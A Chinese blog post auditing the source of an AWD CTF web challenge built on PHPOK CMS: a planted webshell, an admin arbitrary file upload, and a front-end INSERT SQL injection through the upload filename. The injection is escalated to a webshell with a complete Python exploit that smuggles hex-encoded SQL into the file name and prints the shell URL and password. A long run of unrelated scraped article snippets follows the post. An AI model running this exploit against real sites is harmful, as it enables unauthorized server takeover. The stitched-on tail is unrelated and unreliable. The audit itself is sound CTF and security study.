卿's Blog

代码审计-四叶草杯线下awd比赛源码web2

今晚简单来看看那天比赛的源码吧，比赛的时候还是有些慌没有好好去静下心看代码。

awd给的题中的漏洞，都是那种可以快速让你利用拿到权限后得到flag的那种，特别复杂利用的一般没有。

建议先黑盒去尝试，例如前台上传，后台上传，等等，执行失败再来结合代码审计看看是否可以绕过利用。

所以审计中重点关注预留后门，注入，文件上传，命令/代码执行。

0x01 预留后门

没有太多套路和隐藏就是明显的马

比较有意思的是第一个大马。

当时以为就是普通的$pass = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel 输入密码即可但是发现并不是

输入angel密码后把md5给我返回回来了看看代码

$pass  = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
.........

....


/* 身份验证 */
if ($act == "logout") {
    scookie('loginpass', '', -86400 * 365);
    @header('Location: '.SELF);
    exit;
}
if($pass) {
    if ($act == 'login') {
        if ($pass == encode_pass($P['password'])) {
            scookie('loginpass',encode_pass($P['password']));
            @header('Location: '.SELF);
            exit;
        }
    }
    if (isset($_COOKIE['loginpass'])) {
        if ($_COOKIE['loginpass'] != $pass) {
            loginpage();
        }
    } else {
        loginpage();
    }
}

这里$p是接收的post提交的数组

简单的来说就是接收你输入的password密码，然后encode_pass加密赋值给pass变量，然后scookie函数给你设置cookie，loginpass=加密后你的密码来看看加密的函数

简单的加密后返回md5，

看看scookie函数，这里明显修改后，

这里的setcookie是没有成功的所以直接输入马是进不去，访问的时候必须带着cookie的loginpass字段，值为加密后的angle

0x02 后台任意文件上传getshell

都是admin 当时登录后第一时间是改了后台密码

分析:

漏洞文件:/framework/admin/rescate_control.php 第 53行

public function save_f()
    {
        $id = $this->get('id','int');
        if(!$id){
            if(!$this->popedom['add']){
                $this->json(P_Lang('您没有权限执行此操作'));
            }
        }else{
            if(!$this->popedom['modify']){
                $this->json(P_Lang('您没有权限执行此操作'));
            }
        }
        $title = $this->get('title');
        if(!$title){
            $this->json(P_Lang('附件分类名称不能为空'));
        }
        $root = $this->get('root');
        if(!$root){
            $this->json(P_Lang('附件存储目录不能为空'));
        }
        if($root == '/'){
            $this->json(P_Lang('不支持使用/作为根目录'));
        }
        if(!preg_match("/[a-z0-9\_\/]+/",$root)){
            $this->json(P_Lang('文件夹不符合系统要求，只支持：小写字母、数字、下划线及斜杠'));
        }
        if(substr($root,0,1) == "/"){
            $root = substr($root,1);
        }
        if(!file_exists($this->dir_root.$root)){
            $this->lib('file')->make($this->dir_root.$root);
        }
        $filetypes = $this->get('filetypes');
        if(!$filetypes){
            $this->json(P_Lang('附件类型不能为空'));
        }
        $list_filetypes = explode(",",$filetypes);
        foreach($list_filetypes as $key=>$value){
            $value = trim($value);
            if(!$value){
                unset($list_filetypes[$key]);
                continue;
            }
            if(!preg_match("/[a-z0-9\_\.]+/",$value)){
                $this->json(P_Lang('附件类型设置不正确，仅限字母，数字及英文点符号'));
            }
        }
        $filetypes = implode(",",$list_filetypes);
        $typeinfo = $this->get('typeinfo');
        if(!$typeinfo){
            $this->json(P_Lang('附件类型说明不能为空'));
        }
        $maxinfo = str_replace(array('K','M','KB','MB','GB','G'),'',get_cfg_var('upload_max_filesize')) * 1024;
        $filemax = $this->get('filemax','int');
        if(!$filemax || ($filemax && $filemax>$maxinfo)){
            $filemax = $maxinfo;
        }
        $data = array('title'=>$title,'root'=>$root,'filetypes'=>$filetypes,'typeinfo'=>$typeinfo,'filemax'=>$filemax);
        $data['folder'] = $this->get('folder');
        $data['gdall'] = $this->get('gdall','int');
        if(!$data['gdall']){
            $gdtypes = $this->get('gdtypes');
            $data['gdtypes'] = $gdtypes ? implode(',',$gdtypes) : '';
        }else{
            $data['gdtypes'] = '';
        }
        $data['ico'] = $this->get('ico','int');
        $data['is_default'] = $this->get('is_default','int');
        $this->model('rescate')->save($data,$id);
        $this->json(true);
    }

这段代码是设置可以上传的附件类型的代码

这里只判断附件类型是否为空，并没有限制后缀，导致可以自行添加php后缀，进而执行上传文件操作，获取网站shell。

在phpok 管理员后台，选择工具 > 附件分类管理编辑分类列表。在支持的附件类型： 中添加php

然后再内容管理>行业新闻添加新的文章。在选择图片，资源管理器中上传新的附件。

0x03 前台getshell

比赛的时候源码是开放了前台的功能

在/framework/www/upload_control.php中第61行:

private function upload_base($input_name='upfile',$cateid=0)
    {
        $rs = $this->lib('upload')->getfile($input_name,$cateid);
        if($rs["status"] != "ok"){
            return $rs;
        }
        $array = array();
        $array["cate_id"] = $rs['cate']['id'];
        $array["folder"] = $rs['folder'];
        $array["name"] = basename($rs['filename']);
        $array["ext"] = $rs['ext'];
        $array["filename"] = $rs['filename'];
        $array["addtime"] = $this->time;
        $array["title"] = $rs['title'];
        $array['session_id'] = $this->session->sessid();
        $array['user_id'] = $this->session->val('user_id');
        $arraylist = array("jpg","gif","png","jpeg");
        if(in_array($rs["ext"],$arraylist)){
            $img_ext = getimagesize($this->dir_root.$rs['filename']);
            $my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
            $array["attr"] = serialize($my_ext);
        }
        $id = $this->model('res')->save($array);
        if(!$id){
            $this->lib('file')->rm($this->dir_root.$rs['filename']);
            return array('status'=>'error','error'=>P_Lang('图片存储失败'));
        }
        $this->model('res')->gd_update($id);
        $rs = $this->model('res')->get_one($id);
        $rs["status"] = "ok";
        return $rs;
    }

这是一个文件上传函数，然后在该函数开头又调用了getfile函数，跟进:

public function getfile($input='upfile',$cateid=0)
    {
        if(!$input){
            return array('status'=>'error','content'=>P_Lang('未指定表单名称'));
        }
        $this->_cate($cateid);
        if(isset($_FILES[$input])){
            $rs = $this->_upload($input);
        }else{
            $rs = $this->_save($input);
        }
        if($rs['status'] != 'ok'){
            return $rs;
        }
        $rs['cate'] = $this->cate;
        return $rs;
    }

如果存在上传文件就调用_upload函数，继续跟进:

private function _upload($input)
    {
        global $app;
        $basename = substr(md5(time().uniqid()),9,16);
        $chunk = $app->get('chunk','int');
        $chunks = $app->get('chunks','int');
        if(!$chunks){
            $chunks = 1;
        }
        $tmpname = $_FILES[$input]["name"];
        $tmpid = 'u_'.md5($tmpname);
        $ext = $this->file_ext($tmpname);
        $out_tmpfile = $this->dir_root.'data/cache/'.$tmpid.'_'.$chunk;
        if (!$out = @fopen($out_tmpfile.".parttmp", "wb")) {
            return array('status'=>'error','error'=>P_Lang('无法打开输出流'));
        }
        $error_id = $_FILES[$input]['error'] ? $_FILES[$input]['error'] : 0;
        if($error_id){
            return array('status'=>'error','error'=>$this->up_error[$error_id]);
        }
        if(!is_uploaded_file($_FILES[$input]['tmp_name'])){
            return array('status'=>'error','error'=>P_Lang('上传失败，临时文件无法写入'));
        }
        if(!$in = @fopen($_FILES[$input]["tmp_name"], "rb")) {
            return array('status'=>'error','error'=>P_Lang('无法打开输入流'));
        }
        while ($buff = fread($in, 4096)) {
            fwrite($out, $buff);
        }
        @fclose($out);
        @fclose($in);
        $app->lib('file')->mv($out_tmpfile.'.parttmp',$out_tmpfile.'.part');
        $index = 0;
        $done = true;
        for($index=0;$index<$chunks;$index++) {
            if (!file_exists($this->dir_root.'data/cache/'.$tmpid.'_'.$index.".part") ) {
                $done = false;
                break;
            }
        }
        if(!$done){
            return array('status'=>'error','error'=>'上传的文件异常');
        }
        $outfile = $this->folder.$basename.'.'.$ext;
        if(!$out = @fopen($this->dir_root.$outfile,"wb")) {
            return array('status'=>'error','error'=>P_Lang('无法打开输出流'));
        }
        if(flock($out,LOCK_EX)){
            for($index=0;$index<$chunks;$index++) {
                if (!$in = @fopen($this->dir_root.'data/cache/'.$tmpid.'_'.$index.'.part','rb')){
                    break;
                }
                while ($buff = fread($in, 4096)) {
                    fwrite($out, $buff);
                }
                @fclose($in);
                $GLOBALS['app']->lib('file')->rm($this->dir_root.'data/cache/'.$tmpid."_".$index.".part");
            }
            flock($out,LOCK_UN);
        }
        @fclose($out);
        $tmpname = $GLOBALS['app']->lib('string')->to_utf8($tmpname);
        $title = str_replace(".".$ext,'',$tmpname);
        return array('title'=>$title,'ext'=>$ext,'filename'=>$outfile,'folder'=>$this->folder,'status'=>'ok');
    }

其中 $ext = $this->file_ext($tmpname);是检测文件后缀的，看一下:

private function file_ext($tmpname)
    {
        $ext = pathinfo($tmpname,PATHINFO_EXTENSION);
        if(!$ext){
            return false;
        }
        $ext = strtolower($ext);
        $filetypes = "jpg,gif,png";
        if($this->cate && $this->cate['filetypes']){
            $filetypes .= ",".$this->cate['filetypes'];
        }
        if($this->file_type){
            $filetypes .= ",".$this->file_type;
        }
        $list = explode(",",$filetypes);
        $list = array_unique($list);
        if(!in_array($ext,$list)){
            return false;
        }
        return $ext;
    }

上传是比较严格的，只允许上传后缀是jpg,png,gif这种图片后缀的文件，上传我们无法绕过，但是程序对于上传的文件名没有充份的过滤，在函数末尾，将文件名添加到了返回的数组中:

$tmpname = $GLOBALS['app']->lib('string')->to_utf8($tmpname);
        $title = str_replace(".".$ext,'',$tmpname);
        return array('title'=>$title,'ext'=>$ext,'filename'=>$outfile,'folder'=>$this->folder,'status'=>'ok');
    }

这里的$tmpname就是我们上传的文件名，注意，不是上传后的文件名，而是上传前的文件名，并且没有对该文件名过滤，然后返回。

我们回到开头，upload_base函数中去:

$rs = $this->lib('upload')->getfile($input_name,$cateid);
        if($rs["status"] != "ok"){
            return $rs;
        }
        $array = array();
        $array["cate_id"] = $rs['cate']['id'];
        $array["folder"] = $rs['folder'];
        $array["name"] = basename($rs['filename']);
        $array["ext"] = $rs['ext'];
        $array["filename"] = $rs['filename'];
        $array["addtime"] = $this->time;
        $array["title"] = $rs['title'];
        $array['session_id'] = $this->session->sessid();
        $array['user_id'] = $this->session->val('user_id');
        $arraylist = array("jpg","gif","png","jpeg");
        if(in_array($rs["ext"],$arraylist)){
            $img_ext = getimagesize($this->dir_root.$rs['filename']);
            $my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
            $array["attr"] = serialize($my_ext);
        }
        $id = $this->model('res')->save($array);

可以看到这里将返回值中的title的值赋值给了$array[‘title’],这个值是我们可控的，然后将$array带入到了save函数中，我们看一下该函数:

在/framework/model/res.php中第279行:

public function save($data,$id=0)
    {
        if(!$data || !is_array($data)){
            return false;
        }
        if($id){
            return $this->db->update_array($data,"res",array("id"=>$id));
        }else{
            return $this->db->insert_array($data,"res");
        }
    }

将$data带入到了insert_array函数中，我们看一下该函数:

/framework/engine/db/mysqli.php中第211行:

public function insert_array($data,$tbl,$type="insert")
    {
        if(!$tbl || !$data || !is_array($data)){
            return false;
        }
        if(substr($tbl,0,strlen($this->prefix)) != $this->prefix){
            $tbl = $this->prefix.$tbl;
        }
        $type = strtolower($type);
        $sql = $type == 'insert' ? "INSERT" : "REPLACE";
        $sql.= " INTO ".$tbl." ";
        $sql_fields = array();
        $sql_val = array();
        foreach($data AS $key=>$value){
            $sql_fields[] = "`".$key."`";
            $sql_val[] = "'".$value."'";
        }
        $sql.= "(".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
        return $this->insert($sql);
    }

就是将该数组中的键值遍历出来，将键作为字段名，将值作为对应字段的值。可以看到，对于值是没有进行转义的，其中包括我们可以控制的title的值，那么这里就产生了一个insert的注入。那么这个注入我们有什么用呢？当然首先想到的是一个出数据，但是对于update 或者insert注入，一般来说我会想办法将这个注入升级一下危害。注意这个注入是一个insert注入，并且insert语句是可以一次插入多条内容的，我们不能控制当前这条insert语句的内容，我们可以控制下一条的内容，比如说像这样:
Insert into file values(1,2,3,),(4,5,6)

通过上文说到的，我们可以控制res表中的一行记录的值，那么这个filename也是我们可控的，那么我们如果将filename设置为/res/balisong.php。那么我上传的图片文件就会重新命名成/res/balisong.php。我们就达到了一个getshell的目的。

由于上传的文件名的特殊性。导致我们不能带有斜杠，那么怎么办呢？我们可以利用十六进制编码来绕过，具体的漏洞利用过程就不细说了，比较复杂，所以直接上exp：

来自先知社区

#-*- coding:utf-8 -*-
import requests
import sys
import re
if len(sys.argv) < 2:
    print u"Usage: exp.py url [PHPSESSION]\r\nFor example:\r\n[0] exp.py http://localhost\r\n[1] exp.py http://localhost 6ogmgp727m0ivf6rnteeouuj02"
    exit()
baseurl = sys.argv[1]
phpses = sys.argv[2] if len(sys.argv) > 2 else ''
cookies = {'PHPSESSION': phpses}
if baseurl[-1] == '/':
    baseurl = baseurl[:-1]
url = baseurl + '/index.php?c=upload&f=save'
files = [
    ('upfile', ("1','r7ip15ijku7jeu1s1qqnvo9gj0','30',''),('1',0x7265732f3230313730352f32332f,0x393936396465336566326137643432352e6a7067,'',0x7265732f62616c69736f6e672e706870,'1495536080','2.jpg",
                '', 'image/jpg')),
]
files1 = [
    ('upfile',
     ('1.jpg', '', 'image/jpg')),
]
r = requests.post(url, files=files, cookies=cookies)
response = r.text
id = re.search('"id":"(\d+)"', response, re.S).group(1)
id = int(id) + 1
url = baseurl + '/index.php?c=upload&f=replace&oldid=%d' % (id)
r = requests.post(url, files=files1, cookies=cookies)
shell = baseurl + '/res/balisong.php'
response = requests.get(shell)
if response.status_code == 200:
    print "congratulation:Your shell:\n%s\npassword:balisong" % (shell)
else:
    print "oh!Maybe failed.Please check"

LLaMA Factory添加新模型template的实战解析 herosunly 大模型 llama factory 新模型 template 实战解析
大家好，我是herosunly。985院校硕士毕业，现担任算法研究员一职，热衷于大模型算法的研究与应用。曾担任百度千帆大模型比赛、BPAA算法大赛评委，编写微软OpenAI考试认证指导手册。曾获得阿里云天池比赛第一名，CCF比赛第二名，科大讯飞比赛第三名。授权多项发明专利。对机器学习和深度学习拥有自己独到的见解。曾经辅导过若干个非计算机专业的学生进入到算法行业就业。希望和大家一起成长进步。
基于AT89C52单片机的停车场车位管理系统七月小卖铺单片机单片机嵌入式硬件
点击链接获取Keil源码与ProjectBackups仿真图：https://download.csdn.net/download/qq_64505944/90441636?spm=1001.2014.3001.5501C+18部分参考设计如下：摘要随着科技的快速发展，交通工具的普及程度和汽车保有量的急剧增加，停车难题已经成为全球范围内的共同挑战。特别是在城市化进程不断加快的背景下，传统的人工停车
Wireshark 插件开发实战指南轻口味开发工具 wireshark junit 测试工具
Wireshark插件开发实战指南环境搭建流程图开始使用TortoiseSVN获取Wireshark源码配置编译MSVC,Python等工具链验证依赖库与工具链完整性环境搭建完成一、开发环境与工具准备（一）开发语言选择在Wireshark插件开发中，选择合适的开发语言是至关重要的第一步。不同的语言有其各自的优势和适用场景。Lua脚本语言是一种轻量级的编程语言，它的语法简洁明了，学习曲线平缓，非常适
autojs一个经典的飘浮工具栏界面源码恶猫 auto.js HTML+Script android ui javascript
autojs一般的项目都会有一个全屏界面，点击按钮，弹出个小悬浮窗。但是也有的时候只需要直接弹出小窗就够用了。这时候就用到了。"ui";importClass(android.view.View);auto.waitFor();auto.setMode('normal');setInterval(()=>{},1000);threads.start(function(){varwindow=flo
kubernetes源码之kubelet初始化 buppt kubernetes源码学习 kubernetes docker go golang 云原生
从这篇开始阅读一下kubernetes的源码，kubernetes是使用cobra构建的，如果对cobra还不了解的，可以查看我的上篇文章。零基础入门Cobra---kubernetes源码学习必备kubernetes的源码先从kubelet开始看起。kubelet的启动文件在cmd/kubelet/kubelet.go，入口通过app.NewKubeletCommand()初始化了kubelet
第十五届蓝桥杯大赛软件赛省赛 C/C++ 大学 B 组试题 H: 拔河 @liu666 蓝桥杯 c语言 c++
动态维护数组,set优化，二分。#includeusingnamespacestd;#defineintlonglongconstintn=1e6;inta,b[n],c;signedmain(){cin>>a;for(inti=1;i>b[i];}sett;intan=1e18;for(inti=a;i>=1;i--){intv=0;for(intj=i+1;j=1;j--){v+=b[j];i
nacos启动报错Unable to start embedded Tomcat xsj_592523829 java java spring boot
项目场景：准备使用nacos做配置中心，版本1.3.1（官方推荐稳定版本–2021-01-11）mysql版本：5.7版本（听说5.8改动很大），否则运行不了nacos-mysql.sql文件JDK版本：1.8.0_144（版本低了也不行）问题描述：1、本地idea运行springcloudalibabanacos源码报错UnabletostartembeddedTomcatorg.springf
IgH详解一、概述 EtherCAT.技术研究 IgH详解 ethercat
IgH源码地址：EtherLab/EtherCAT·GitLabIgH是开源的EtherCAT主站协议栈，虽然功能上和从站兼容性比不上商业协议栈，但完全能满足学习和普通场景的使用，公司也可以基于IgH作产品开发，基本能满足大部分使用场景。如有项目需求，欢迎沟通交流。本系列博客主要分为三部分1、介绍IgH主站ec_master运行流程；2、介绍IgH对网卡驱动的实时性优化；3、IgH上层应用程序开发
【2025】项目开发周期中的“多环境”理解在努力的韩小豪 java spring maven java-ee spring boot
基本概念：多环境：同一个项目的源码在不同的开发阶段需要根据实际情况调整配置并部署到不同的机器上。作用【为什么需要？】：隔离项目在不同环境下的运行实况，每个环境互不影响；区分开发周期中的不同阶段：开发/测试/生产；优化项目内容日志只存放于本地机器或服务器，不输出在线上环境中；针对不同的环境可以进行参数调优【如JVM的堆内存大小】精简项目依赖，节省项目体积【如通过maven管理依赖时，可以通过scop
C++ 手写一个线程池余识- C/C++实战入门到精通 c++
注意本专栏已在我的个人站点中完成更新升级，可点击这里直达。本专栏不再更新，不要购买！如有需要，请前往我的自建站点中购买，价格更实惠、内容更丰富、并且继续保持更新。已购买该专栏的同学，可点击这里查看后续调整方案。更多说明，可点击这里查看。文章目录注意前言一、什么是线程池？二、手写一个线程池1.了解线程同步2.线程池类三、源码四、使用示例前言关于线程的内容，可以详见我的另外一篇文章：C/C++thre
Ubuntu系统下交叉编译bzip2 linux运维交叉编译
一、交叉编译bzip21.下载libpng源码下载bzip2：https://sourceware.org/bzip2/downloads.html下载并解压源码。tar-xvzfbzip2-1.0.8.tar.gzcdbzip2-1.0.82.设置环境变量设置交叉编译工具链的环境变量：exportPATH=/home/yoyo/360Downloads/toolchains/arm-linux-
【网络安全 | 渗透工具】小程序反编译分析源码 | 图文教程秋说网安渗透工具使用教程(全)web安全漏洞挖掘小程序
未经许可，禁止转载。本文仅供学习使用，严禁用于非法渗透测试，笔者不承担任何责任。文章目录1、下载Proxifier2、下载反编译工具unveilr3、寻找小程序文件包4、对文件包进行反编译5、对源码进行分析6、渗透思路6.1、查找敏感信息泄露6.2、解析加解密逻辑6.3、枚举API接口并测试反编译是通过逆向工程将小程序包还原为接近源代码的形式。这一过程能够帮助我们提取大量有价值的信息，从而辅助漏洞
蓝桥杯web第三天蒟蒻的贤 css
展开扇子题目，#box:hover#item1{transform:rotate(-60deg);}当悬浮在父盒子，子元素旋转webkitdisplay:-webkit-box：将元素设置为弹性伸缩盒子模型。-webkit-box-orient:vertical：设置伸缩盒子的子元素排列方式为垂直排列。overflow:hidden：隐藏超出元素容器的内容。text-overflow:ellips
蓝桥杯备考1 计算机小白进化版CM 程序设计基础学习蓝桥杯算法职场和发展
第一题#includeusingnamespacestd;typedeflonglongLL;intmain(intargc,char*argv[]){inta,b,c,d,e,f,g,h;ints=0;for(a=0;a>，cout用usingnamespacestd;intmain(){printf("%d",'L');//输入字符时注意用‘’单引号。return0;}第三题#includeu
教育培训APP开发全攻略：从网校系统源码搭建到功能优化的技术方案万岳科技程序员小金 APP开发教学教育平台开发教育小程序软件开发 APP开发在线教育系统源码教育APP开发教育平台搭建
本篇文章，笔者将从网校系统源码搭建到功能优化的角度，全面解析教育培训APP的开发技术方案，帮助企业和开发者更好地理解如何提升在线教育平台的性能与用户体验。一、教育培训APP开发的核心架构教育培训APP的架构设计是其能否顺利运行和扩展的基础。在设计过程中，需要考虑到用户数量、数据存储、信息安全、系统响应速度等多个因素。因此，架构的选择至关重要。1、前端架构：用户体验为核心教育培训APP的前端设计直接
医疗陪诊APP开发实战：从互联网医院系统源码开始万岳科技程序员小金软件开发教学 APP开发教学医疗陪诊APP APP开发软件开发互联网医院系统源码智慧医疗APP开发医疗陪诊小程序
本文将从互联网医院系统源码出发，深入探讨医疗陪诊APP的开发实战。一、从互联网医院系统源码入手开发医疗陪诊APP的基础在于互联网医院系统的源码。互联网医院系统通常包括以下几个模块：1.用户管理：用户注册、登录、信息管理等功能。2.预约系统：用户可以在线预约医生，实现智能化排队。3.问诊功能：支持在线问诊，方便患者与医生进行沟通。4.数据管理：用户的就医记录、药品信息等数据存储与管理。二、医疗陪诊A
互联网医院系统源码详解：陪诊问诊APP开发的技术路径万岳科技程序员小金软件开发教学 APP开发教学医疗陪诊APP APP开发软件开发陪诊问诊APP开发智慧医疗平台开发开源软件
开发一个功能完善的陪诊问诊APP，不仅需要考虑用户需求，还需要依托坚实的技术架构。本篇文章，笔者将详细介绍互联网医院系统源码，并探讨陪诊问诊APP的开发技术路径。一、互联网医院系统源码概述互联网医院系统源码，通常是指可以支持医院在线就诊、远程问诊、在线开方、药品配送等功能的系统源码。这类系统的核心是能够在平台上实现医生与患者之间的实时互动，且可以满足多种医疗服务需求。对于陪诊问诊APP来说，系统的
URP中Shader获取屏幕信息_CameraOpaqueTexture 不吃斋的和尚 unity 游戏引擎计算机视觉算法前端
1.URP管线下Bulidin中的GrabPass是失效的；2.URP中对应的是_CameraOpaqueTexture;使用方法如下：//YJJ:2023.11.15Shader"Common/Show/Glass"{Properties{[Header(Option)][Enum(Off,0,On,1)]_ZWriteMode("ZWriteMode",float)=0[Enum(UnityE
Ubuntu系统下交叉编译nasm linux运维交叉编译
一、交叉编译nasm1.下载源码下载nasm：https://www.nasm.us/pub/nasm/releasebuilds/下载并解压源码。wgethttps://www.nasm.us/pub/nasm/releasebuilds/2.16.03/nasm-2.16.03.tar.gztar-xvzfnasm-2.16.03.tar.gzcdnasm-2.16.03mkdirnasmbu
一篇文章搞懂C#中的泛型类/泛型方法/泛型接口方程式sunny C#c#
一篇文章搞懂C#中的泛型类/泛型方法/泛型接口链接:源码提起泛型类，很多人就头疼，我也头疼。在C#中这个概念很重要，重要的向定义一个int数值类型一样，但是这个内容又不像if···else那样容易理解。我花费了两天的时间，把整个知识点梳理了一遍，希望讲清楚，也当给自己做个笔记。泛型类（GenericClasses）泛型类是一种可以处理多种数据类型的数据结构或算法模板。它允许在定义类时使用一个或多个
RAII - 安卓中的智能指针 Mr.pyZhang #RAII android c++面试
目录RAII-安卓中的智能指针概念spwpRefBase是什么怎么用对比标准库为什么不直接用标准库？实现上的区别优缺点RefBase类内部类weakref_type成员函数spwp强引用sp弱引用wp源码注释RefBase接口强引用decStrongincStrong弱引用incWeakdecWeakweakref_type具体实现析构函数RAII-安卓中的智能指针概念spwpRefBase是什么
14届蓝桥杯真题：飞机降落（c++实现） Davidand c++算法图论
问题描述N架飞机准备降落到某个只有一条跑道的机场。其中第i架飞机在Ti时刻到达机场上空，到达时它的剩余油料还可以继续盘旋Di个单位时间，即它最早可以于Ti时刻开始降落，最晚可以于Ti+Di时刻开始降落。降落过程需要Li个单位时间。一架飞机降落完毕时，另一架飞机可以立即在同一时刻开始降落，但是不能在前一架飞机完成降落前开始降落。请你判断N架飞机是否可以全部安全降落。输入格式输入包含多组数据。第一行包
蓝桥杯备考冲刺必刷题（C++） | 蓝桥云课 760 数的计算热爱编程的通信人蓝桥杯 c++职场和发展
本文为付费文章，相较于个人免费文章，将提供更完整的解题思路、详细的代码注释。通过付费支持，您将获得更优质的学习体验和更高效的提升路径。专栏特色1.真题解析：精选蓝桥杯青少组竞赛真题，逐题详细讲解，帮助您掌握解题技巧。2.经典算法练习：根据蓝桥杯青少组竞赛大纲，挑选经典算法题目，提供代码实现与指导，助您夯实算法基础。3.系统化学习：从基础到进阶，循序渐进，帮助您全面提升编程能力。附上汇总贴：蓝桥杯备
第十一届蓝桥杯大赛软件赛省赛C/C++ 大学 B 组子串分值和 60%解法徽京人蓝桥解析蓝桥杯 c语言 c++
题目描述对于一个字符串SS，我们定义SS的分值f(S)f(S)为SS中出现的不同的字符个数。例如f(“aba”)=2，f(“abc”)=3,f(“aaa”)=1f(“aba”)=2，f(“abc”)=3,f(“aaa”)=1。现在给定一个字符串S[0...n−1]S[0...n−1]（长度为nn），请你计算对于所有SS的非空子串S[i...j](0≤i≤jusingnamespacestd;con
【图像几何】图像空间变换（仿射变换）【含GUI Matlab源码 841期】 Matlab领域 matlab
Matlab领域博客之家
阿里云ESC windws服务器部署springboot+vue前后端分离项目溫冬＇＇123 项目部署 spring boot 阿里云服务器
window服务器部署springboot+vue项目前期准备：1、完整的项目源码我这里的项目前端是vue，后端是springboot+redis+mysql2、服务器我使用的是阿里云的ESC服务器（偷偷告诉你们，新手都可以白嫖一个月的服务器）服务器系统是windows至于我为什么不用linux，害别说了，新手还是先用window先吧。3、服务器环境搭建我们部署项目需要搭建项目的环境，其实仔细想想
C# .Net 开发设计多用户网上商城源码_OctShop
随着C#在TIOBE编程语言排行不断上升，这也标志着越来越多的程序员开始使用C#来开发项目了。在TIOBE2023年10月公布的排行中，C#和Java之间的差距越来越小了，仅为1.2%，随着C#.NetCore的免费开源，这一上升的趋势越来越明显，TIOBECEOPaulJansen认为，如果这一趋势继续保持，那么C#将在两个月后超过Java。在当前所有的编程语言中，Java出现了大幅度下跌，为-
win11编译pytorchvision cuda128版本流程 System_sleep pytorch python 编译 windows cuda
1.前置条件本篇续接自win11编译pytorchcuda128版本流程，阅读前请先参考上一篇配置环境。访问https://kkgithub.com/pytorch/vision/archive/refs/tags/v0.21.0.tar.gz下载源码，下载后解压。2.编译打开MiniforgePrompt，依次执行如下代码：condaactivatetorch_build_envcondains
【花雕学编程】Arduino FOC 之四连杆机构轮腿机器人的复杂路径规划驴友花雕机器人嵌入式硬件单片机 c++Arduino动手做四连杆机构轮腿机器人的复杂路径规划
Arduino是一个开放源码的电子原型平台，它可以让你用简单的硬件和软件来创建各种互动的项目。Arduino的核心是一个微控制器板，它可以通过一系列的引脚来连接各种传感器、执行器、显示器等外部设备。Arduino的编程是基于C/C++语言的，你可以使用ArduinoIDE（集成开发环境）来编写、编译和上传代码到Arduino板上。Arduino还有一个丰富的库和社区，你可以利用它们来扩展Ardui
第十三届蓝桥杯大赛软件赛决赛C/C++ 大学 B 组 Kent_J_Truman 蓝桥杯蓝桥杯
A【2022——暴力DP/优雅背包】-CSDN博客B【钟表——类日期问题】-CSDN博客C【卡牌——二分】-CSDN博客D【最大数字——DFS】-CSDN博客E【出差——Dijkstra】-CSDN博客F【费用报销——01背包】-CSDN博客G【故障——条件概率】-CSDN博客H【机房——LCA】-CSDN博客I【齿轮——优化（预处理，去重，哈希）】-CSDN博客J【搬砖——经典带贪心01背包（背
多线程编程之理财周凡杨 java 多线程生产者消费者理财
现实生活中，我们一边工作，一边消费，正常情况下会把多余的钱存起来，比如存到余额宝，还可以多挣点钱，现在就有这个情况：我每月可以发工资20000万元（暂定每月的1号），每月消费5000（租房+生活费）元（暂定每月的1号），其中租金是大头占90%，交房租的方式可以选择（一月一交，两月一交、三月一交），理财：1万元存余额宝一天可以赚1元钱，
[Zookeeper学习笔记之三]Zookeeper会话超时机制 bit1129 zookeeper
首先，会话超时是由Zookeeper服务端通知客户端会话已经超时，客户端不能自行决定会话已经超时，不过客户端可以通过调用Zookeeper.close()主动的发起会话结束请求，如下的代码输出内容 Created /zoo-739160015 CONNECTEDCONNECTED .............CONNECTEDCONNECTED CONNECTEDCLOSEDCLOSED
SecureCRT快捷键 daizj secureCRT 快捷键
ctrl + a : 移动光标到行首ctrl + e ：移动光标到行尾crtl + b: 光标前移1个字符crtl + f: 光标后移1个字符crtl + h : 删除光标之前的一个字符ctrl + d ：删除光标之后的一个字符crtl + k ：删除光标到行尾所有字符crtl + u : 删除光标至行首所有字符crtl + w: 删除光标至行首
Java 子类与父类这间的转换周凡杨 java 父类与子类的转换
最近同事调的一个服务报错，查看后是日期之间转换出的问题。代码里是把 java.sql.Date 类型的对象强制转换为 java.sql.Timestamp 类型的对象。报java.lang.ClassCastException。代码：
可视化swing界面编辑朱辉辉33 eclipse swing
今天发现了一个WindowBuilder插件，功能好强大，啊哈哈，从此告别手动编辑swing界面代码，直接像VB那样编辑界面，代码会自动生成。首先在Eclipse中点击help，选择Install New Software,然后在Work with中输入WindowBui
web报表工具FineReport常用函数的用法总结（文本函数）老A不折腾 finereport web报表工具报表软件 java报表
文本函数 CHAR CHAR(number):根据指定数字返回对应的字符。CHAR函数可将计算机其他类型的数字代码转换为字符。 Number:用于指定字符的数字，介于1Number:用于指定字符的数字，介于165535之间（包括1和65535）。示例: CHAR(88)等于“X”。 CHAR(45)等于“-”。 CODE CODE(text):计算文本串中第一个字
mysql安装出错林鹤霄 mysql安装
[root@localhost ~]# rpm -ivh MySQL-server-5.5.24-1.linux2.6.x86_64.rpm Preparing... #####################
linux下编译libuv aigo libuv
下载最新版本的libuv源码，解压后执行： ./autogen.sh 这时会提醒找不到automake命令，通过一下命令执行安装（redhat系用yum，Debian系用apt-get）： # yum -y install automake # yum -y install libtool 如果提示错误：make: *** No targe
中国行政区数据及三级联动菜单 alxw4616
近期做项目需要三级联动菜单,上网查了半天竟然没有发现一个能直接用的! 呵呵,都要自己填数据....我了个去这东西麻烦就麻烦的数据上. 哎,自己没办法动手写吧. 现将这些数据共享出了,以方便大家.嗯,代码也可以直接使用文件说明 lib\area.sql -- 县及县以上行政区划分代码（截止2013年8月31日)来源：国家统计局发布时间：2014-01-17 15:0
哈夫曼加密文件百合不是茶哈夫曼压缩哈夫曼加密二叉树
在上一篇介绍过哈夫曼编码的基础知识,下面就直接介绍使用哈夫曼编码怎么来做文件加密或者压缩与解压的软件,对于新手来是有点难度的,主要还是要理清楚步骤; 加密步骤: 1,统计文件中字节出现的次数,作为权值 2,创建节点和哈夫曼树 3,得到每个子节点01串 4,使用哈夫曼编码表示每个字节
JDK1.5 Cyclicbarrier实例 bijian1013 java thread java多线程 Cyclicbarrier
